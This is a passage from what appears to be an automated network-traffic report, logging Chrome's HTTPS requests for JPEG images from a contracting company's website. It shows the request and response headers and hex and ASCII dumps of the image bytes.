                                              Data Ascii: XW9h+jdaP?vv*lG7DwHD>'WOq)zKU_*gO7#ljHp(b429B7"xjO[X{`zG#.PmS/ESac*=>ht]v"SFC2
                                              2024-09-27 06:20:26 UTC8000INData Raw: 71 6a ec 4a 54 d4 53 57 3d e7 12 ea 74 69 8d 7b 06 22 e0 0f b3 14 c3 3b 95 f9 ff 00 c7 ff 00 a2 e2 ac ff 00 c2 fa d9 72 67 6e 6a 69 99 66 ea 37 9b f6 36 f1 b1 02 34 77 2b da ec 76 07 36 11 b3 b3 28 66 9f d3 4a a9 9a 09 91 71 2c d8 8f af da e5 0b e4 8a bd b9 d9 ba fc 7b 14 93 59 4b 3a 54 a4 4a 51 4e c2 78 2f 33 36 62 d7 0c bc 13 5e 10 c7 c1 66 d4 93 f6 13 1d 79 63 24 d9 2f 95 55 58 34 c9 8a 3b 29 90 f0 56 e2 44 4e d1 a6 b4 cd 87 da 2d cc aa 79 72 a8 89 4b dd b7 b3 18 00 7a 73 f8 44 f7 44 6a ba dd 82 c1 b1 6c 1e a6 ad ab e4 cb 3b d1 28 ca 49 19 b5 dd 82 09 6c e1 79 f0 8a e5 94 5b 18 b1 f4 cb 41 5d 8b e0 34 32 e5 51 cc 99 ba aa de 15 96 16 6b db 76 c3 ba 0d 87 1e 37 88 c3 5b 4e 6f 16 c4 70 09 f2 f0 f6 97 37 0e 9e 37 8f 66 59 b7 96 00 4b 10 4e 54 1d e2 4f ad
                                              Data Ascii: qjJTSW=ti{";rgnjif764w+v6(fJq,{YK:TJQNx/36b^fyc$/UX4;)VDN-yrKzsDDjl;(Ily[A]42Qkv7[Nop77fYKNTO
                                              2024-09-27 06:20:26 UTC8000INData Raw: 31 2e 30 2f 6d 6d 2f 22 20 78 6d 6c 6e 73 3a 73 74 45 76 74 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 45 76 65 6e 74 23 22 20 78 6d 6c 6e 73 3a 73 74 52 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 52 65 66 23 22 20 78 6d 6c 6e 73 3a 64 63 3d 22 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 65 6c 65 6d 65 6e 74 73 2f 31 2e 31 2f 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 6c 6e 73 3a 63 72 73 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 63 61 6d 65 72 61
                                              Data Ascii: 1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:crs="http://ns.adobe.com/camera
                                              2024-09-27 06:20:26 UTC8000INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii:
                                              2024-09-27 06:20:26 UTC8000INData Raw: f2 10 6f 5d bf fb 54 55 69 ff 00 e3 d6 e3 fd d1 ff 00 a0 ad 59 6f f9 08 3f fb bf fb 54 52 19 0c 3f ea 6c fd 3c c5 ff 00 d0 9e 95 7e ec bf f5 c8 7f e8 06 92 1f f8 f7 b2 ff 00 ae 89 ff 00 a1 3d 2a fd d9 7f eb 90 ff 00 d0 0d 00 3d ba 43 fe eb 7f e8 0b 4b 27 dd 9f fe 07 ff 00 a0 0a 46 fb b0 7f ba df fa 02 d1 27 dd 9f fe 07 ff 00 a0 0a 40 3e 6f f5 93 7f bc df c9 69 93 7f c7 ac df ef 49 fd 29 d3 7d f9 bf de 6f fd 05 69 b3 67 ec d3 ff 00 bd 27 fe cb 40 c9 26 ff 00 8f b8 ff 00 ed a7 fe 80 2a 44 ff 00 8f 86 ff 00 ae 8b ff 00 a0 54 73 7f c7 d4 7f f6 d3 ff 00 40 15 22 ff 00 c7 c3 7f d7 45 ff 00 d0 28 11 14 3f 76 1f f7 d3 ff 00 41 34 f8 7e f3 ff 00 d7 34 ff 00 d0 a9 b6 fc 88 7f eb a2 7f e8 26 9d 0f de 7f fa e6 9f fa 15 00 35 3f e3 de 6f ac df ce a4 ff 00 96 87 fd e5
                                              Data Ascii: o]TUiYo?TR?l<~=*=CK'F'@>oiI)}oig'@&*DTs@"E(?vA4~4&5?o
                                              2024-09-27 06:20:26 UTC8000INData Raw: 5b de 49 cc 97 42 21 e8 95 a7 2a 44 5d b2 56 b4 96 4e 6e 2f db 1d d5 3e 51 50 98 74 ab 6e 5d c4 8d ee c4 ff 00 2a 89 ad 6c d0 e6 6b 96 94 fd 7f c2 9c b7 56 91 f1 05 af 98 7f dd cd 3b 31 0e 7d 4a 07 5d 90 59 b3 af 6d ab 81 50 c5 a7 bd cb 12 d0 7d 9c 76 3b 87 f2 ab 4b 35 dc 83 f7 76 eb 18 ff 00 6a 9a d0 dc 3f fa db a5 88 7b 71 56 9b 5d 49 69 32 84 d6 32 c2 d8 c6 f1 ed 55 f9 1c 1e 0d 68 34 76 70 9c bc ed 2b 7b 1a 24 b8 86 e0 6d 4b 77 90 f6 35 a7 32 22 cd 19 d5 24 73 c9 0f dc 72 be dd aa ca e9 cf 27 3b 5a 31 fe d1 15 0c 96 72 26 07 0c 4f 4c 1a 7a 3d 05 b0 d6 bc 9a 46 f9 e4 65 5e fb 78 a9 91 6c 71 b9 de 49 1b d1 b3 9a 62 d8 5c 37 fc b2 2a 3d 5f e5 fe 75 22 e9 ad cf ef 14 7b 26 49 a7 ec a4 f6 41 ed 12 dd 92 47 71 0c 67 f7 16 9b 8f ab 0a b0 b7 37 b2 7d d8 d2 31
                                              Data Ascii: [IB!*D]VNn/>QPtn]*lkV;1}J]YmP}v;K5vj?{qV]Ii22Uh4vp+{$mKw52"$sr';Z1r&OLz=Fe^xlqIb\7*=_u"{&IAGqg7}1
                                              2024-09-27 06:20:26 UTC8000INData Raw: 76 ec 76 6c ff 00 08 cf ad 6d 67 c8 45 d7 31 a0 17 e6 1f 5a 15 7f a7 f3 a8 44 f3 33 0d 96 cd d7 f8 8e 29 57 ed 24 f0 88 bd 3e f1 f7 ac b9 4b b9 38 5e 9f 5f e9 49 b7 e5 ff 00 80 8a 45 82 e5 f1 99 55 7f dd 5f 6a 3e c0 ec b9 6b 89 3a 0f bb c5 3b 2e e1 af 61 e4 6d 61 9e 06 6a 36 92 35 ce 5d 47 1e be f4 a3 4b 8b 78 dc 5d f9 ee d4 e5 b1 81 73 fb b5 e9 df 9a 2d 11 6a 42 6e a1 5c fc e0 9f 6f ad 27 db 17 f8 51 db 9c f0 b5 6f c9 55 ce 14 01 ec 3d c5 1b 7f f4 2a 3d de c3 d4 a7 f6 89 5b ee c0 dd 0f 53 8f 4a 31 72 fd 63 45 00 77 35 73 6f cb f8 37 f4 a3 f8 7f 0f ea 69 a9 f2 bb c4 4e 3c ca cc 76 9b aa 6a 5e 1f be 8a f3 4e bb 92 d6 e6 26 0e af 1b 10 55 b8 20 83 d4 11 d8 d7 d9 df 00 ff 00 6e 61 23 5b e8 9e 3d 7c a3 01 1c 7a b2 8f 9d 4e 54 fe f1 47 de 1f 2f 51 c8 f7 ea 3e
                                              Data Ascii: vvlmgE1ZD3)W$>K8^_IEU_j>k:;.amaj65]GKx]s-jBn\o'QoU=*=[SJ1rcEw5so7iN<vj^N&U na#[=|zNTG/Q>
                                              2024-09-27 06:20:26 UTC8000INData Raw: 7b ee c3 db 76 46 87 db 21 56 ce fe fe 94 df b7 c4 14 01 b8 9f 61 ed 55 02 fb 52 f9 62 ad 61 a2 43 ae cb 4d a9 2f 38 8d cf 18 ed e9 56 ae 95 e4 d3 5e 54 c8 25 37 70 79 15 9b e5 d6 d6 93 20 92 d9 a2 6e 76 ff 00 23 5b 46 8a 85 ec 66 ea f3 6e 66 69 ff 00 be b8 93 28 a1 58 91 d4 9c e7 9a b3 35 9b ae 4c 72 79 7b 7b 6d 15 09 84 e9 f3 1c 1f 97 3c 7e 1f fd 6c 52 b3 c9 71 39 6d c5 57 a0 00 d5 a8 ae 5b 49 07 36 ba 32 15 8a 67 eb 33 7e 14 ff 00 b1 9e 37 4a e7 f1 a9 23 93 13 79 7b 79 a2 49 95 67 4d dc 22 9c 9c 77 34 b9 62 ba 05 db 1a 2c 61 1f 7b 27 ea 69 c2 1b 65 ec bf 9d 59 f3 2c 6e 3e f0 50 7f 2a 0e 97 04 9f ea e5 c7 e2 0d 68 a2 ba 10 e4 cf 47 f8 6b b3 fb 02 41 1e 36 f9 ed d3 e8 2b af 8f bd 72 5f 0d ed cd ae 83 22 16 dd fb f6 39 fc 05 75 d1 f7 af ab c3 7f 06 27 c7
                                              Data Ascii: {vF!VaURbaCM/8V^T%7py nv#[Ffnfi(X5Lry{{m<~lRq9mW[I62g3~7J#y{yIgM"w4b,a{'ieY,n>P*hGkA6+r_"9u'
                                              2024-09-27 06:20:26 UTC8000INData Raw: ae 4c 7d 3e 4a b6 3b 30 35 55 5a 3c c8 f3 29 ad f6 f6 ef fd 05 55 9a 11 b4 ff 00 bb fd 2b d1 ee 3c 0f 6a c3 e5 79 c7 d5 85 65 dc 78 16 1f f9 f8 98 2e 31 fc 3f e1 5e 67 29 e9 dc da f0 af 31 c6 7f e9 8a ff 00 21 5d 0b 0f 94 d6 17 87 61 16 ef e5 02 5b 64 61 72 7b e3 15 be ff 00 74 d7 e8 34 b5 a6 8f ce 2b e9 51 a3 c5 fc 5c 99 d7 ee 8f fd 34 1f c8 56 11 18 fc eb b9 d7 bc 36 fa 8e a5 71 3a dc ac 60 b9 3b 4c 79 e9 c7 5c fb 56 2c 9e 0f b8 4c e2 e6 33 e9 94 23 fa 9a f8 7c 4a fd f4 fd 5f e6 7d f6 15 fe e2 1e 8b f2 39 d6 c6 47 d6 9d b7 83 f4 ad 69 3c 25 7b bb 02 48 09 fa b0 fe 94 df f8 46 ef d7 23 f7 2d 81 c9 0e df fc 4d 72 f2 9d 37 32 9d 7e 4f f3 e9 5e db e1 bf f8 f0 4f f7 57 f9 57 91 4b a2 de aa e0 c2 a7 fd d7 1e 9e f5 eb de 1d 05 6c 94 1e a1 54 7e 95 f4 39 3a f7
                                              Data Ascii: L}>J;05UZ<)U+<jyex.1?^g)1!]a[dar{t4+Q\4V6q:`;Ly\V,L3#|J_}9Gi<%{HF#-Mr72~O^OWWKlT~9:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              148192.168.2.465486173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:26 UTC460OUTGET /uploads/news/2/d80813aa6c19571f16d2a8796b810d49.jpeg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:26 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:26 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:28:05 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 67181
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:26 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 02 00 01 03 04 05 06 07 08 09 ff da 00 08 01 01 00 00 00 00 f4 20 a5 97 89 4b 3f 53 42 da 0a cd 0e 38 59 a5 c7 48 72 47 2b 88 59 24 63 a9 62 cc f2 c9 6a e4 11 c1 04 71 85 66 95 3b a3
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm" K?SB8YHrG+Y$cbjqf;
                                              2024-09-27 06:20:26 UTC8000INData Raw: 1c 68 ef f2 b4 f4 39 7d 3a a9 a8 f3 19 4d 23 d7 d6 9e 67 6e f9 72 6d d1 e5 f5 77 6f cd 95 67 93 bf c2 f5 b8 3d 8f 9b f5 a7 6d 79 7d 3e 6e 1e fc 4c bb 73 d3 07 17 67 4a 2b 27 4e bc 43 83 cb f6 fc de 4f 76 9c fd dc 5d 94 6f 11 b6 15 da 27 af 87 3b 65 c5 e8 76 78 f5 f4 72 e8 a5 b2 cd 4c ba 9d ba e5 cb cb e9 67 7b 56 9b 67 4e d8 e7 1c 7e 15 fd ae ed 30 e1 af 87 f4 7d d4 a4 cd 2f d3 c5 3b 76 f9 d6 c2 dc fe 5f b1 b4 cc 46 1a 2f 19 cf 4c 52 62 91 b6 1b 67 9d 2f cd d3 df d1 c3 06 5c bc bb fa bf 3d 4f 4b af c7 8a fa fa 6b 7e 7f 27 cc fa 8e b8 e1 f1 7d ef 5b cf cf 37 4d 2d 38 f9 fd f1 a7 2e bb 65 86 ad 51 1c 79 7a 3b 39 76 d1 e9 79 f4 39 af 6e 6e 1e ee 5f 4a 29 9f 05 7d 9e 1b f4 c6 7b fa f8 79 de 2f b9 dd 86 71 bd 72 e9 e4 d3 24 d7 3b 6f 96 34 d7 5b 29 cd c9 df d1
                                              Data Ascii: h9}:M#gnrmwog=my}>nLsgJ+'NCOv]o';evxrLg{VgN~0}/;v_F/LRbg/\=OKk~'}[7M-8.eQyz;9vy9nn_J)}{y/qr$;o4[)
                                              2024-09-27 06:20:27 UTC8000INData Raw: de 1e 6e f9 aa aa eb d3 af 5a aa 22 a8 a5 68 18 bc 38 11 48 79 58 01 36 84 a1 00 59 3d dc 52 0d e3 c0 60 68 34 38 27 b7 67 08 1e 0e 9d 95 89 c1 88 18 80 d0 0b 2b 2e 27 25 a2 8b 22 2c a4 30 e2 b1 9c 1c 1c f2 b6 46 27 11 8d ca 8c e4 e6 29 21 28 c0 59 42 23 48 84 35 63 51 0a 10 c0 6e ee ef f3 be 07 d9 b5 df 35 55 55 55 55 43 83 87 e9 54 41 07 09 f1 80 b1 c1 0a 50 4a 12 95 d9 5a dd b5 38 14 0e 28 29 2d b8 5d 2e 24 a2 38 8b e0 2d a9 41 e5 2c 92 aa 00 70 c0 b0 a5 3c 8c 5a c2 c2 82 bb be 46 12 df 0a c7 38 6d 0a 20 2d 49 cd 7a f6 ed b9 18 26 d6 b1 89 31 76 08 c0 00 18 30 65 dd f3 59 77 5f b4 64 55 55 55 55 7d 6a 88 a2 2a b8 aa 22 ba f5 20 a4 b6 50 53 4d e2 9d 40 2b 2e 87 56 e2 42 9b 69 57 84 38 9a 65 90 90 42 8b 9e 43 8a 29 24 2d 2d 11 80 27 1a c9 b2 0a d2 03 cc
                                              Data Ascii: nZ"h8HyX6Y=R`h48'g+.'%",0F')!(YB#H5cQn5UUUUCTAPJZ8()-].$8-A,p<ZF8m -Iz&1v0eYw_dUUUU}j*" PSM@+.VBiW8eBC)$--'
                                              2024-09-27 06:20:27 UTC8000INData Raw: 38 73 de 1a 7b 8e 16 37 8b 53 14 6a 56 54 b1 3b 1d a5 2d 42 30 41 c8 08 ee e4 81 7b f3 89 48 ad 36 a5 67 1c cc a7 de 92 57 73 f4 83 de cb fa 69 2b f7 a4 5e c0 6c 25 57 ab 5a b3 3f b8 bb 75 06 0e fd 72 a8 51 6d 86 93 11 49 50 d3 b6 9b 83 ce 1c 46 25 fb cc 89 c3 a7 49 83 6c f5 58 77 95 47 0a fc b0 e2 33 05 39 2f ef 79 88 a1 10 5f 41 cb a0 94 a9 82 b4 d5 82 93 a5 f7 32 8d 3b dd ac 65 37 51 4f bb b8 27 73 16 99 7a 96 cb 9b 50 25 5c 2e 00 3b 77 60 56 37 1f 35 a5 15 a8 ac b7 62 3f 43 17 13 9b 37 0b ca 14 29 83 9b 35 a6 2b 13 8a ef 5a a2 d8 7b ab 15 7b 92 eb a0 dc 5a 63 b1 55 34 c3 d5 22 fa 5c 68 04 ad 87 7b b0 b6 9d 6f 2e e6 03 a1 1b c5 cd 97 2c a6 0f 0a fd 7b 69 d3 aa a1 dc 2f 0d e3 9a a3 ec e6 c8 37 ff 00 54 ab 5a 9d 16 ee ed 7d fd 9c 98 7a 87 ca 5b 59 7b 09
                                              Data Ascii: 8s{7SjVT;-B0A{H6gWsi+^l%WZ?urQmIPF%IlXwG39/y_A2;e7QO'szP%\.;w`V75b?C7)5+Z{{ZcU4"\h{o.,{i/7TZ}z[Y{
                                              2024-09-27 06:20:27 UTC8000INData Raw: c5 e6 60 5d 85 a7 49 a6 b1 6f a9 b0 e9 d6 11 6b 7a c5 65 ca cb 9a dc f9 89 dd b6 70 6e 8d ce 5e 55 5d c5 bb 2c 6f 33 90 a9 ce 29 55 a4 da 8b 6b e7 05 12 cf 4b 89 09 fd 25 cc ca 72 88 12 95 81 f5 f6 52 d6 bc 12 db 19 9a d7 fd 65 2a 40 66 71 6e b1 2a be 4a 5e e0 e7 da e7 31 1f 84 5c ce f0 92 4e 93 97 4e db eb 0b 35 ce c2 71 4b 6d 19 d7 2b 7b bd 27 71 8a ac 96 d8 cd 75 96 97 84 e8 39 c7 41 77 fd 21 53 b7 63 66 bc f0 ed d6 61 5d 2a 2e 21 3f c5 86 e2 32 59 93 89 3e 69 c3 38 6f 00 a6 78 cd fa 42 75 8a 5f 2b b7 a4 a3 91 5d 6d 78 6f a1 df 94 d6 f0 e7 b9 8c fa 4e e9 c6 ba 19 dd d1 ca 0d f3 6d e5 14 b1 66 d9 66 76 27 ac 39 6f 0c 31 8a 6a 7d 26 b1 ab 14 40 6c a0 71 40 a4 e5 3a 4b c6 7d 40 b4 09 b8 94 c2 d3 27 73 cf a4 a9 45 32 d4 e2 57 d0 34 65 ae a5 5a c0 ee 39 4a
                                              Data Ascii: `]Iokzepn^U],o3)UkK%rRe*@fqn*J^1\NN5qKm+{'qu9Aw!Scfa]*.!?2Y>i8oxBu_+]mxoNmffv'9o1j}&@lq@:K}@'sE2W4eZ9J
                                              2024-09-27 06:20:27 UTC8000INData Raw: f8 5f 90 fc 99 ff 00 a5 c1 ff 00 35 79 af 1a 45 6f b7 3d 08 5f c7 85 95 63 db 37 e8 8a 32 4b d5 42 22 72 54 08 db 93 d7 48 b9 a5 66 a6 45 c7 51 50 c3 7e 5d 7c 6c 01 92 c7 fc a0 c0 00 68 08 55 55 fd 10 e8 7e 89 4e 8f 19 99 99 ee 67 bf 19 ed 97 33 dc 2f b9 9e fc 1f 33 3d cc f7 e2 bc 53 db e6 a5 4a 95 03 c5 4a 95 03 c1 2a 66 04 09 52 a5 4a f1 5f 85 4a f2 ca 89 2a 54 e6 f5 97 08 79 3c 0f e1 ab f1 1d 23 d0 fe 63 e1 8f e2 78 1f c4 49 fe fb a3 fe 6b fc 2a 3a 8c 57 6b fb 95 0f 43 fa f0 92 92 9b 33 29 d0 b1 5c 5e 00 46 02 65 cb b5 df 37 13 a4 d7 58 41 91 98 9c 10 25 4a 8e 97 a8 b4 de 6d 2b 2f 83 c8 4a 95 2a 54 a9 50 3f 0a 81 2b cd 4a 95 02 54 af 35 2b c1 2b f0 af 24 a9 5e 2a 57 8a 95 e2 bf 1b fc 2a 2b c0 fe fc 5f 82 10 7c 1e 33 c1 98 02 61 33 8b 8d 0f 71 31 7e d1
                                              Data Ascii: _5yEo=_c72KB"rTHfEQP~]|lhUU~Ng3/3=SJJ*fRJ_J*Ty<#cxIk*:WkC3)\^Fe7XA%Jm+/J*TP?+JT5++$^*W*+_|3a3q1~
                                              2024-09-27 06:20:27 UTC8000INData Raw: 66 00 9d ac 2f b0 64 a1 b3 a8 6d 2a e4 1c f9 3e e0 3b bd 0e 11 0a 25 61 1a b0 e9 a8 23 0b fb dc 33 0b d3 4c 01 18 76 f6 bb 85 51 40 62 18 54 98 de 2c 99 42 ef a9 66 e5 60 7c c0 57 19 5e 15 9a b1 7d 1e fe 19 5d 22 7a 1c c2 62 a8 ca b0 c2 e5 0a 9b a9 5e 82 56 30 08 8d 87 b9 65 8e 5b 69 8a a0 00 e2 13 20 1a 73 f7 0a a1 6c 2a 2d c0 1c 01 2e 05 ea 1e 63 06 69 c4 03 42 f1 00 a2 ac c6 08 34 a0 95 fb 01 ab 6a 6e 50 63 47 68 11 56 cc 7e 06 02 a8 73 08 8e 6b 57 07 ea 0d cc 6e 85 e0 7d 66 06 e5 b0 1e 7d c6 97 f8 19 c6 15 c0 ca 62 8d 5e 53 94 42 cd 86 a0 d7 c0 33 5c b2 ca c3 a8 bb 35 1f 4d cd aa a4 81 80 1f 39 0e a2 39 77 6b a3 f4 4b d5 1d e8 85 64 20 ea e3 0b be 0f 4c 05 3d 4c 3c 02 5d 52 db 41 7b 4d b7 0f 0a c3 6e ea 14 5c b1 4e 63 a0 eb 25 f8 42 f6 41 d8 b0 4b 01
                                              Data Ascii: f/dm*>;%a#3LvQ@bT,Bf`|W^}]"zb^V0e[i sl*-.ciB4jnPcGhV~skWn}f}b^SB3\5M99wkKd L=L<]RA{Mn\Nc%BAK
                                              2024-09-27 06:20:27 UTC8000INData Raw: 4b dc 66 05 0d 46 71 d9 18 2f 2c a8 30 6f 31 7d c8 6a d9 18 22 18 c6 74 4a 6c 8a e2 0e 97 2c 73 55 1a e0 1f 78 8d 23 07 6d ca ab 5e 89 a1 96 11 33 83 70 08 c2 2b 1a 52 8d 67 e2 5c ad f8 4f c3 18 b2 61 76 c3 5e 46 0c b8 b3 13 59 f0 b9 70 30 65 fa f1 53 6c 4a f7 90 f8 dc 62 24 b4 24 83 c3 68 43 e3 20 46 a6 de 2f 84 f0 f8 41 86 c1 aa e6 05 3f 33 1d 91 cb 4a 4e 60 b7 a0 80 93 14 42 4f b2 6c 26 a6 00 e5 95 01 5c 11 97 a0 db 0e d1 b0 e6 5f 6b 1c 4e 4a 89 02 cb c4 33 63 2a a0 49 43 bc 42 67 5d cb 81 97 15 06 1e 62 04 b7 a4 b6 aa 43 e2 e7 a0 84 33 61 19 43 54 82 f2 10 08 bb 9b a8 9d 82 f0 84 2a 53 54 7e 20 6a ab 46 9b 50 e2 6e 15 f5 2f cd 54 aa e0 cd 5a 31 02 93 8c 10 c1 56 e5 e6 1e 35 c2 4a cd 03 6e 3a 6d af 2c 54 60 8c 4b e3 5b 8a 22 29 69 35 e3 d4 2d 96 e8 f3
                                              Data Ascii: KfFq/,0o1}j"tJl,sUx#m^3p+Rg\Oav^FYp0eSlJb$$hC F/A?3JN`BOl&\_kNJ3c*ICBg]bC3aCT*ST~ jFPn/TZ1V5Jn:m,T`K[")i5-
                                              2024-09-27 06:20:27 UTC3250INData Raw: 00 01 00 02 03 11 12 21 04 10 13 22 31 20 30 40 41 32 42 50 51 14 23 05 15 33 60 71 ff da 00 08 01 03 01 01 08 00 da 6b dc 3d 09 de 8c 8c 3f aa a2 3e bb 7f d1 69 08 04 7d a3 f0 c5 cb 02 b0 2b b6 57 68 a1 19 5d b5 db 6a c1 88 08 97 fa d6 4c 5d c6 0f 5d d5 de 7a ee 3d 19 1e b3 2b 2f ab fb be d3 6b 7f 00 69 09 08 42 42 8b 98 7d db 16 41 66 17 75 77 0a ee 3d 77 0d 2c dc b2 2a fe eb f7 7d a6 d6 fe 77 f7 63 e8 fe ef b4 da df f0 25 0f a2 3e d3 6b 7f c0 94 3e 88 fb 4d ad ff 00 02 50 fa 23 ed 2b a5 7f 09 90 59 b1 77 23 41 ed 77 e9 fb 0c 96 4b 25 92 c9 65 f1 a5 5d 2b ed 2d 5a b5 6a d5 ab 56 ad 5a 9a 49 0b dd 8b 5f 26 5e 53 3f 23 e1 52 2e 10 a6 39 5a 25 05 6a d5 ab 56 ad 5a b5 6b 25 6a d5 fc 77 f6 54 55 2a 54 a9 52 a5 4a 95 2a 58 aa 54 b0 58 2c 16 0a 96 09 cd d2 3f
                                              Data Ascii: !"1 0@A2BPQ#3`qk=?>i}+Wh]jL]]z=+/kiBB}Afuw=w,*}wc%>k>MP#+Yw#AwK%e]+-ZjVZI_&^S?#R.9Z%jVZk%jwTU*TRJ*XTX,?


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              149192.168.2.465485173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:26 UTC459OUTGET /uploads/news/4/0538734f181f0860806608250501d2ae.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:26 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:26 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:28:33 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 94270
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:26 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 06 07 03 08 ff da 00 08 01 01 00 00 00 00 e6 24 d7 00 42 6a 0a 20 00 08 00 00 00 8a 22 a0 28 00 0a 8a a2 fa 76 ef 9e 2d 04 00 10 00 14 00 14 00 50 1c 00 2a 56 c2 e8 3b
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm"$Bj "(v-P*V;
